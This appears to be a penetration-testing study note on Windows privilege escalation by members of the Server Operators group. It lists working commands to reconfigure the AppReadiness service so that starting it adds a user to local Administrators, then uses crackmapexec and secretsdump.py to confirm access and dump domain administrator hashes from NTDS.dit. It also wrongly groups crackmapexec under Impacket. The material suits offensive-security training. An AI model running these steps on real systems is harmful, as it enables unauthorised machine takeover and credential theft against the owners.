Key Concepts:
Service Permissions:
The
Server Operatorsgroup hasSERVICE_ALL_ACCESSto many services.This allows them to modify service configurations.
Service Modification:
The
AppReadinessservice is used as an example.The service's binary path is modified to execute a command.
Privilege Escalation:
The modified service command adds the attacker's user to the local administrators group.
This results in full control over the machine.
Approach, Commands, Tools, and Techniques:
Service Query:
sc qc AppReadiness(Verify service details).
Service Permissions Check:
PsService.exe security AppReadiness(VerifyServer Operatorspermissions).
Local Administrators Check:
net localgroup Administrators(Verify current group members).
Service Configuration Modification:
sc config AppReadiness binPath= "cmd /c net localgroup Administrators server_adm /add"(Modify service binary path).
Service Start (Trigger):
sc start AppReadiness(Start the service, triggering the command).
Local Administrators Verification:
net localgroup Administrators(Verify successful group addition).
Post-Exploitation:
crackmapexec smb <target_ip> -u <user> -p <password>(Verify administrative access).secretsdump.py <user>@<target_ip> -just-dc-user administrator(Extract NTDS.dit hashes).
Commands:
sc qcsc configsc startnet localgroup Administratorscrackmapexec smbsecretsdump.py
Tools:
sc.exe(Windows built-in)PsService.exe(Sysinternals)crackmapexec(Impacket)secretsdump.py(Impacket)
Techniques:
Abusing service permissions.
Modifying service configurations.
Adding users to local administrators group.
Post-exploitation using Impacket.
Key Considerations:
Service availability: The targeted service must be available.
Permissions: The account must be a member of the Server Operators group.
Post exploitation: Once admin access is granted, many post exploitation tasks are available.
Last updated